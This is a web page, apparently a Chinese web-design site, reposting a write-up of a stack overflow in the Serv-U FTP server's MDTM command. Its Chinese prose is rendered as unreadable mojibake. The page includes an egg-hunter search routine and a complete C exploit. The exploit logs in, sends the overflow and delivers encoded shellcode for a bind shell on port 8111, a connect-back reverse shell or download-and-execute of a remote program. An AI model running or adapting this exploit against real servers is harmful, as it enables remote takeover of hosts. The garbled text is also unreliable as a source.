ÍøÕ¾Éè¼Æ|ÍøÕ¾ÖÆ×÷|ÍøÕ¾½¨Éè·þÎñÍø
¡¡¡¡×ÊÉîµÄÍøÕ¾Éè¼ÆÈËÔ±£¬ÒÔ¾«Õ¿µÄÍøÕ¾Éè¼Æ¼¼Êõ¡¢ÓÅÖʵÄÍøÕ¾ÖÆ×÷·þÎñ,ΪÄúÌṩȫ·½Î»µÄÍøÕ¾Éè¼Æ¡¢ÍøÕ¾ÖÆ×÷·þÎñ£¬¾«ÐÄÍƳöÍøÕ¾ÖÆ×÷µÄ¶àÖÖ¿Æѧ·½°¸,´ÓÍøÕ¾Éè¼Æµ½ÍøÕ¾ÖÆ×÷¡¢ÍøÕ¾Íƹ㡢±£Ö¤Äú×î´óÏÞ¶ÈÓµÓÐÐÅÏ¢»¯µÄÍøÕ¾Éè¼ÆÓÅÊÆ.

Serv-U MDTM Time Zone Exploit

ÎÒÓõÄServ-U 5.0À´²âÊÔ£¬Ïȹ¹ÔìÁËÒ»¸öºÜ³¤µÄʱÇø£¬·¢ÏÖ¾ÓȻûÓз´Ó¦£¬·´¸´Ëõ¶ÌʱÇø³¤¶Èºó£¬¸Ð¾õËƺõµÚÒ»¸ö¿Õ¸ñµÄ³öÏÖλÖò»ÄÜÌ«¿¿ºóʱ²ÅÄÜ´¥·¢¡£ÎҲ¿ÉÄÜÃüÁîµÄ³¤¶ÈÓÐÏÞÖÆ£¬ÖÁÉÙÊDZ»½Ø¶Ï¹ýÔÙ´¦ÀíµÄ£¬Èç¹ûµÚÒ»¸ö¿Õ¸ñ³öÏÖµÄλÖÃÌ«¿¿ºó£¬Serv-U¾ÍÒÔΪÊÇÔÚ²éѯһ¸ö³¤ÎļþµÄÐÞ¸ÄÈÕÆÚ£¬Òç³ö¾Í²»»á´¥·¢ÁË¡£
ÓÚÊÇÎÒÓÖ»ØÀ´´îÁ˸öexploitµÄ¼Ü×Ó£¬ÒÔÄܹ»´¥·¢µÄ×Ö·û´®¹¹ÔìµÄ¡£ÒÔ³£¹æµÄ·½·¨È·¶¨ÁËretµãºó£¬ÓÃOllydbgÁ¬½Óµ½Serv-UÊØ»¤½ø³Ì£¬¿´ÔÚÒì³£´¦ÀíµÄʱºò·¢ÉúÁËЩʲô¡£½á¹ûÊǺÍÏëÏóÖеÄÒ»Ñù£¬ÔÚÒ»²½Ò»²½µØ¸ú×Ùµ½call ebx£¬È»ºónop nop jmp 4µ½³£¹æ·½·¨µÄÓ¦¸ÃÊÇshellcodeµÄµØ·½Ê±£¬ÎÒ×ÐϸÊýÁËÊýµ±Ç°eipλÖø½½üµÄÄÚÈݺͷ¢Ë͵Äԭʼ×Ö·û´®ÏàͬµÄ×Ö½ÚÊý£¬ºÃÏñÊÇÁ¬Ç°Ãæ¼ÓÆðÀ´Ò»¹²ÊÇ294×Ö½Ú£¬ºÁÎÞÒÉÎʵģ¬·¢ËÍÊý¾Ý±»½Ø¶ÏÁË¡£
ÕâʱºòµÄµÚÒ»¸ö·´Ó¦ÊÇÂíÉÏÈ¥ÕÒtiny shellcode£¬²»¹ýºÜÒź¶£¬ÊµÔÚÊÇûÓÐÕÒµ½¡£ÎÒÓÖ·­ÁËÒ»ÏÂeyasµÄWS_FTPµÄÄÇƪÎÄÕ£¬¾õµÃÓ¦¸ÃºÜÏñ£¬µ«ÊÇÄǸö¿ÉÒÔÓÐ512×Ö½ÚµÄ×ÔÓÉ·¢»Ó¿Õ¼ä£¬ÎÞÂÛÈçºÎ£¬294×Ö½ÚËƺõÉÙÁËÒ»µã¡£Õâʱºò´óÔ¼ÊÇ11µãÁË£¬ÎÒ´òËãÏÈ»Øȥ˯¾õ£¬ÒòΪ¿´ÁËÒ»ÌìµÄ¶¯»­£¬ÂúÄÔ´ü×°µÄ¶¼ÊÇ˹¿¨£¨Scar?£©µÄ¶ñÐÄ×ìÁ³£¬Ôõôд¼¯Öв»Á˾«Éñ¡£
µÚ¶þÌì¹ýÀ´µÄʱºò£¬ÎÒÏëÊÔÊÔÄܲ»ÄÜÔÚÄÚ´æÖÐÕÒµ½Ô­Ê¼µÄbuffer¡£Õâ´ÎÎÒÔÚÒ»¸ö³¬³¤µÄMTDMÃüÁîºóÃæ¼ÓÁËSWAN×÷Ϊ±ê¼Ç£¬Òç³ö´¥·¢µÄʱºòÎÒËÑË÷ÁËһϣ¬¹ûÈ»ÔÚedi¸½½ü·¢ÏÖÁËԭʼµÄÊý¾Ý£¬¶øÇÒËƺõ»¹Óкü¸¸ö¿½±´¡£Õâ¸öʱºò¼Ä´æÆ÷ebx/esi/edi/ebp/esp¼¸ºõ¶¼ÔÚ11xxxxx¸½½ü£¬´ÓÕâЩ¿ªÊ¼ÍùºóÕÒÓ¦¸ÃÄܹ»ÕÒµ½Ã»Óо­¹ý¼Ó¹¤´¦ÀíµÄԭʼÊý¾Ý£¬ÎÒ¾õµÃÕâ¸öexploitÓ¦¸ÃÂíÉÏ¿ÉÒÔÍê³ÉÁË¡£
ÎÒµÄÏë·¨ÊÇ°ÑÒ»¸ö±ê¼Ç×÷ΪÍêÕûÐÔµÄÅжϣ¬±ÈÈçbuffer×îºóµÄ¡°SWAN¡±£¬È»ºóÏòÇ°ËÑË÷µ½real shellcodeµÄÍ·£¬×îºóÌøת¹ýÈ¥Ö´ÐС£ÎªÁ˱£Ö¤Òç³öµÄ°²È«´¥·¢£¬ÎÒ°ÑËÑË÷µÄsearch code·Åµ½ÁËʱÇøÖУ¬¶ø°Ñreal shellcode·Åµ½ÁËÎļþÃûÖС£¸½´ø˵һ¾ä£¬ÕâÀïÒªÒ»¸ö·ûºÏÎļþÃû±àÂëµÄshellcode£¬ºÃÔÚÇ°ÃæµÄsite chmodµÄʱºòÒѾ­½â¾öÁËÕâ¸öÎÊÌ⣬ֱ½ÓÄÃÀ´ÓþͿÉÒÔ¡£

search code»¹ÊÇÓе㿼Âǵģ¬Èç¹ûÊǺÜÍêÃÀµÄ»°£¬Ó¦¸ÃÊǶ¯Ì¬¶¨Î»µ±Ç°Î»Ö㬽ӹÜÒì³£´¦Àí£¬ÀûÓÃÆæżУÑéºÍÀ´ÅжÏԭʼbufferÊÇ·ñÍêÕûµÈµÈ¡£²»¹ýÔ½ÏëÎÊÌâÔ½À´Ô½¶à£¬ÎÒÓÖ±¾À´¾ÍÊǸöÀÁÈË£¬×öÕâЩ¶«Î÷Æñ²»ÊÇÒªÎÒµÄÃü£¬¸É´à×ö¸öÂíÂí»¢»¢Äܹ»½«¾Í¹ýÈ¥µÄ¾Í¿ÉÒÔÁË¡£ÎªÁËÄܹ»Í¨Óã¬retµØַûÓÐÓÃcall ebxµÄ0x7FFA4A1B£¨ÕâÍæÒâ¶ùµ½ÁËXPÏÂÃæ²»Ðеģ©£¬¶øÊÇÓõÄlionÉÏÒ»´Îsite chmodÖиøµÄpop/pop/retµØÖ·0x7ffa1571¡£Õâ¸ö¾Ý˵Äܹ»Á¬win2k3¶¼¸ã¶¨£¬ÎÒÊÇûÓлúÆ÷¿ÉÒÔ²âÊÔ£¬Ö»ÔÚÓ¢ÎÄ°æµÄXPºÍÖÐÎÄ°æµÄ2kÏÂÃæ¿´ÁËһϣ¬È·ÊµÊÇ¿ÉÒÔÓᣲ»¹ýÓÃÕâ¸öµÄ»°edi±»¸ÄµôÁË£¬¼ÓÉÏXPµÈÒì³£´¦ÀíÖÐcall ecxºóebx³ÉÁË0x00000000£¬ÎҾʹÓesp¿ªÊ¼ÏòÏÂËÑË÷µÄ£¬²âÊÔÁËÒ»¸öWin2KºÍÒ»¸öWinXP£¬¶¼ÄÜÕÒµ½¡£
·Ï»°¾Í²»Óöà˵£¬¸ú½øÈ¥¿´¿´¾ÍÖªµÀÁË¡£Search codeÊÇÕâÑù£º

//"\xCC" // int3 ; for test :-))
"\x8B\xDC" // mov ebx, esp ; "pop ebx" is also OK
"\xB8\x52\x57\x41\x4E" // mov eax, 4E415753h
"\x40" // inc eax ; eax eq "SWAN" now
"\x43" // inc ebx
"\x39\x03" // cmp [ebx], eax
"\x75\xFB" // jne -5 ; search "SWAN"
"\xB8\x90\x90\x90\x90" // mov eax, 90909090h
//"\xCC" // int3 ; for test
"\x4B" // dec ebx
"\x39\x03" // cmp [ebx], eax
"\x75\xFB" // jne -5 ; search nop/nop/nop/nop
"\xFF\xD3" // call ebx
"\x20\x20"; // <SP> to ensure the overflow

´ó¸ÅÒâ˼¾ÍÊÇÕÒSWAN£¬ÕÒµ½ºóÏòÇ°ÕÒµ½Á¬ÐøµÄ4¸önop£¬ÒÔ´ÎÈ·¶¨ÍêÕûµÄshellcodeµÄµØÖ·£¬È»ºóÌø¹ýÈ¥Ö´ÐУ¬ºóÃæÁ½¸ö¿Õ¸ñ£¨0x20£©µÄÒâ˼ÂǰÃæÒѾ­Ëµ¹ýÁË~

ÍêÕûÒ»µãµÄexploitÊÇÕâÑù×Ó£¬²»ÓÃдȨÏÞ£¬Äܹ»µÇ½¼´¿É¡£ÎÒûÓвâÊÔ¼¸Ì¨»úÆ÷£¨×Ô¼ºÓõÄÈý̨¼ÓÒ»¸öÐéÄâ»ú£©£¬²»ÖªµÀ»á²»»áÓÐÆäËûµÄδ·¢ÏÖµÄÎÊÌ⡪¡ª±Ï¾¹ÎÒÊÇ´¿ºÚºÐÁ¬ÃÉ´ø²Â²âÊԵģ¬Ò»¶¡µã·´»ã±à¶¼Ã»ÓÐÈ¥¿´¡£»¹ÓÐÒ»¾ä»°£¬Serv-U 5.0ÒÔϵķ½·¨Òª¼òµ¥Ð©£¬µ«ÕâÖÖ·½·¨¶Ô´Ó3.x¿ªÊ¼µÄ¶«Î÷¶¼ÓÐЧ¹û£¬Èç¹ûÄã¾õµÃretµØÖ·²»Ë¬£¬Çë×Ô¼º¸Ä¡£Õâ¸ö¶ÔÖÐÎÄ°æµÄ2k/XP/2k3ÓÐЧ¡£

/*
Serv-U allows a MDTM command that less than 294 bytes, it is too short to exploit.
However, we could send a MDTM command as long as we wish, and we can easily find our
raw buffer in the memory. To be brief, you can find that near [edi] when overflow
happened. So search from the edi, and you can exploit it.
My way to exploit this could be described as follow:

+------+----------------------+---------+------+---------+
| MDTM | long buffer with + | buffer1 | <SP> | buffer2 |
+------+----------------------+---------+------+---------+

buffer1:
+--------------+--------------------+-------------------+
|nop nop jmp 4 | addr of "call ebx" | short search code |
+--------------+--------------------+-------------------+

buffer2: (as the filename)

+----------------+----------------+-------------+
|flag 0x90909090 | real shellcode | flag SWAN |
+----------------+----------------+-------------+

The real shellcode must be a valid filename, see the "site chmod exploit" to get
more information about how to make the shellcode valid.
*/

#include <winsock.h>
#include <windows.h>
#include <stdio.h>

#pragma comment (lib,"ws2_32")

void help(char *program)
{
printf ("=======================================================\r\n");
printf ("Serv-U MDTM Time Zone Stack Overflow Xploit v0.20 alpha\r\n");
printf (" For Serv-U 5.0 and below written by SWAN@SEU\r\n");
printf ("=======================================================\r\n\r\n");
printf ("Usage: %s <Host> <Port> <User> <Pass> \r\n", program);
printf (" %s <Host> <Port> <User> <Pass> <url>\r\n", program);
printf (" %s <Host> <Port> <User> <Pass> <Your IP> <Your port>\r\n", program);
printf ("e.g.:\r\n");
printf (" %s 127.0.0.1 21 test test\r\n", program);
printf (" %s 127.0.0.1 21 test test http://hack.co.za/swan.exe\r\n", program);
printf (" %s 127.0.0.1 21 test test 202.119.9.42 8111\r\n", program);
return;
}

unsigned char bpsc[]=
//shellcode flag, necessary!
"\x90\x90\x90\x90"
//decode code, suppose the ebx is near the encoded shellcode
"\x90\x8B\xC3\xBB\x51\x50\x50\x50\x4B\x40\x39\x18\x75\xFB\x40\x40"
"\x40\x33\xC9\x90\x90\x66\xB9\x7D\x01\x80\x34\x08\x99\xE2\xFA\x90"
"\x50\x50\x50\x50"

//encoded shellcode, binding port
"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99"
"\x86\x36" //<== Port xor 0x9999, default is 8111
"\xAA\x59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";

#define IP_OFFSET 253
#define PORT_OFFSET 248
unsigned char cbsc[]=
"\x90\x90\x90\x90"
"\x90\x8B\xC3\xBB\x51\x50\x50\x50\x4B\x40\x39\x18\x75\xFB\x40\x40"
"\x40\x33\xC9\x90\x90\x66\xB9\x7D\x01\x80\x34\x08\x99\xE2\xFA\x90"
"\x50\x50\x50\x50"

//connect back, from http://www.xfocus.net/articles/200307/574.html
"\x70\x6D\x99\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85"
"\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A"
"\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A"
"\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC"
"\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58"
"\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12"
"\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71"
"\xE9\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3"
"\x9B\xC0\x71\xC4\x99\x99\x99\x1A\x75\xDD\x12\x6D\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66\xCE\x61\x12"
"\x41\x10\xC7\xA1\x10\xC7\xA5\x10\xC7\xD9\xFF\x5E\xDF\xB5\x98\x98"
"\x14\xDE\x89\xC9\xCF\xAA\x59\xC9\xC9\xC9\xF3\x98\xC9\xC9\x14\xCE"
"\xA5\x5E\x9B\xFA\xF4\xFD\x99\xCB\xC9\x66\xCE\x75\x5E\x9E\x9B\x99"
"\x9E\x24\x5E\xDE\x9D\xE6\x99\x99\x98\xF3\x89\xCE\xCA\x66\xCE\x65"
"\xC9\x66\xCE\x69\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66"
"\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\x9E\x66\x66\x66\xDE\xFC"
"\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC"
"\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED"
"\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB"
"\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA"
"\xF6\xFA\xF2\xFC\xED\xD8\x99\xFA\xF6\xF7\xF7\xFC\xFA\xED\x99";

unsigned char dehead[]=
"\x90\x90\x90\x90"
"\x90\x8B\xC3\xBB\x51\x50\x50\x50\x4B\x40\x39\x18\x75\xFB\x40\x40"
"\x40\x33\xC9\x90\x90\x66\xB9\xF0\x01\x80\x34\x08\x99\xE2\xFA\x90"
"\x50\x50\x50\x50"

//download & execute, modified slightly...
"\x70\x4D\x99\x99\x99\xC3\x21\x95\x69"
"\x64\xE6\x12\x99\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5"
"\x9A\x6A\x12\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA"
"\x74\xCF\xCE\xC8\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED"
"\x91\xC0\xC6\x1A\x5E\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF"
"\xBD\x9A\x5A\x48\x78\x9A\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A"
"\x5A\x58\x78\x9B\x9A\x58\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F"
"\x97\x12\x49\xF3\x9D\xC0\x71\xC9\x99\x99\x99\x1A\x5F\x94\xCB\xCF"
"\x66\xCE\x65\xC3\x12\x41\xF3\x98\xC0\x71\xA4\x99\x99\x99\x1A\x5F"
"\x8A\xCF\xDF\x19\xA7\x19\xEC\x63\x19\xAF\x19\xC7\x1A\x75\xB9\x12"
"\x45\xF3\xB9\xCA\x66\xCE\x75\x5E\x9D\x9A\xC5\xF8\xB7\xFC\x5E\xDD"
"\x9A\x9D\xE1\xFC\x99\x99\xAA\x59\xC9\xC9\xCA\xCF\xC9\x66\xCE\x65"
"\x12\x45\xC9\xCA\x66\xCE\x69\xC9\x66\xCE\x6D\xAA\x59\x35\x1C\x59"
"\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A"
"\x71\xBE\x66\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB"
"\xFC\xEA\xEA\x99\xDE\xFC\xED\xCA\xE0\xEA\xED\xFC\xF4\xDD\xF0\xEB"
"\xFC\xFA\xED\xF6\xEB\xE0\xD8\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99"
"\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD"
"\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEC\xEB\xF5\xF4\xF6\xF7\x99"
"\xCC\xCB\xD5\xDD\xF6\xEE\xF7\xF5\xF6\xF8\xFD\xCD\xF6\xDF\xF0\xF5"
"\xFC\xD8\x99";
//"http://127.0.0.1/hello.exe"
//"\x80";

unsigned char desc[500]={0};

void main(int argc, char *argv[])
{
WSADATA wsaData;
SOCKET s;
struct hostent *he;
struct sockaddr_in host;
int nTimeout = 1000;
if(argc != 5 && argc != 6 && argc != 7)
{
help(argv[0]);
return;
}
if(argc == 6)
{
//initialize the download & execute shellcode
//shellcode head + ((url + 0x80) xor 0x99 ) <==all for damned :
memset(desc, 0, 500);
memcpy(desc, dehead, sizeof(dehead));
char url[255];
strcpy(url, argv[5]);
strcat((char*)url, "\x80");
for(unsigned int j=0; j < strlen(url); j++)
url[j] = url[j]^\x99;
strcat((char*)desc, url);
}
if(argc == 7)
{
unsigned short port = htons(atoi(argv[6]))^(u_short)0x9999;
unsigned long ip = inet_addr(argv[5])^0x99999999;
memcpy(&cbsc[PORT_OFFSET], &port, 2);
memcpy(&cbsc[IP_OFFSET], &ip, 4);
}

if(WSAStartup(0x0101,&wsaData) != 0)
{
printf("error starting winsock..");
return;
}
if((he = gethostbyname(argv[1])) == 0)
{
printf("Failed resolving %s",argv[1]);
return;
}
host.sin_port = htons(atoi(argv[2]));
host.sin_family = AF_INET;
host.sin_addr = *((struct in_addr *)he->h_addr);

if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("Failed creating socket");
return;
}

if ((connect(s, (struct sockaddr *) &host, sizeof(host))) == -1)
{
printf("Failed connecting to host\r\n");
return;
}
setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, (char*)&nTimeout,sizeof(nTimeout));

char buff[50000]={0};
memset(buff, 0, sizeof(buff));

char szUser[255] = {0};
strcpy(szUser, "USER ");
strcat(szUser, argv[3]);
strcat(szUser, "\r\n");

char szPass[255] = {0};
strcpy(szPass, "PASS ");
strcat(szPass, argv[4]);
strcat(szPass, "\r\n");

int bread = recv(s,buff,sizeof(buff),0);
if(bread == -1)
{
closesocket(s);
printf("No response... Perhaps it has been hacked!\r\n");
return;
}
printf(buff);

//send user
send(s, szUser, strlen(szUser), 0);
memset(buff, 0, sizeof(buff));
recv(s, buff, sizeof(buff), 0);
printf(buff);

//send pass
send(s, szPass, strlen(szPass), 0);
memset(buff, 0, sizeof(buff));
recv(s, buff, sizeof(buff), 0);
printf(buff);

if(buff[0] == 5)
{
closesocket(s);
printf("Authentication failed!\r\n");
return;
}

char xploit[1500] = {0};
char head[] = "MDTM 19811102172800+In_My_Dream_I_Always_See_You_Soar_Above_The_Sky";

/*************************************************************************
Search the "SWAN" to ensure the buffer is intact, then search backwards
to find the head of shellcode.
*************************************************************************/
char search[] = //"\xCC" // int3 (for test)
"\x8B\xDC" // mov ebx, esp
"\xB8\x52\x57\x41\x4E" // mov eax, 4E415753h
"\x40" // inc eax
"\x43" // inc ebx
"\x39\x03" // cmp [ebx], eax
"\x75\xFB" // jne -5
"\xB8\x90\x90\x90\x90" // mov eax, 90909090h
//"\xCC" // int3 (for test)
"\x4B" // dec ebx
"\x39\x03" // cmp [ebx], eax
"\x75\xFB" // jne -5
"\xFF\xD3" // call ebx
"\x20\x20"; // <SP> to ensure the overflow

memset(xploit, 0, sizeof(xploit));
strcpy(xploit, head);
*((int*)(xploit + strlen(head) + 0)) = 0x04EB9090; //nop nop jmp 4
*((int*)(xploit + strlen(head) + 4)) = 0x7ffa1571;//0x7FFA4A1B; //jmp ebx

// copy the search code
memcpy(xploit + strlen(head) + 8, search, sizeof(search));

// copy the shellcode
if(argc == 5)
memcpy(xploit + strlen(head) + 8 + strlen(search), bpsc, sizeof(bpsc));
if(argc == 6)
memcpy(xploit + strlen(head) + 8 + strlen(search), desc, strlen((char*)desc));
if(argc == 7)
memcpy(xploit + strlen(head) + 8 + strlen(search), cbsc, sizeof(cbsc));

// copy the flag. SWAN? Its me~
strcat(xploit, " SWAN\r\n");
//printf(xploit);
send(s, xploit, strlen(xploit), 0);

memset(buff, 0, sizeof(buff));
bread = recv(s, buff, sizeof(buff), 0);
if(bread == -1)
{
closesocket(s);
if(argc == 5)
printf("Success! Try connect port 8111 to get your shell...\r\n");
if(argc == 6)
printf("Success! Host has download and execute the program...\r\n");
if(argc == 7)
printf("Success! See your nc.exe...\r\n");
return;
}
printf("Failed... Perhaps it has been patched!\r\n");
closesocket(s);
return;
}